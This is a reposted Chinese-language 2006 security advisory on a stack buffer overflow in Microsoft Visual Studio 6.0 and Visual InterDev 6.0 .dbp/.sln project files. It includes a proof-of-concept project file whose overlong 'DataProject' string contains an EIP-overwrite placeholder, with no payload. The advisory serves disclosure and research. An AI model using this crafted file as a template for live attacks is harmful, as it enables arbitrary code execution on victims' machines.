Microsoft Visual Studio DBP和SLN文件DataProje…

信息提供：

安全公告（或线索）提供热线：51cto.editor@gmail.com

漏洞类别：

输入验证漏洞

攻击类型：

远程攻击

发布日期：

2006-03-04

更新日期：

2006-03-06

受影响系统：

Microsoft Visual Studio 6.0

Microsoft Visual InterDev 6.0

安全系统：

无

漏洞报告人：

Kozan （kozan@spyinstructors.com）

ATmaCA （atmaca@atmacasoft.com）

漏洞描述：

BUGTRAQ ID: 16953

Microsoft Visual Studio是微软公司的开发工具套件系列产品，是一个基本完整的开发工具集，包括了软件整个生命周期中所需要的大部分工具。

Visual Studio的数据库项目文件（.dbp）和解决方案（.sln）文件格式中存在缓冲区溢出漏洞，攻击者可能利用此漏洞在机器上执行任意指令。

如果这些文件的“DataProject”字段中包含有超长的字符串的话，就会触发栈溢出，完全控制EIP寄存器，导致执行任意指令。

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# Microsoft Developer Studio Project File - Database Project

Begin DataProject = "Project1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXX \

AAAA123456AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \

AAAAAAAAAAAAAAAAAAAAAAAAAA \

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \

AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

End

解决方法：

厂商补丁：

Microsoft

---------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

（责任编辑：zhaohb）

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有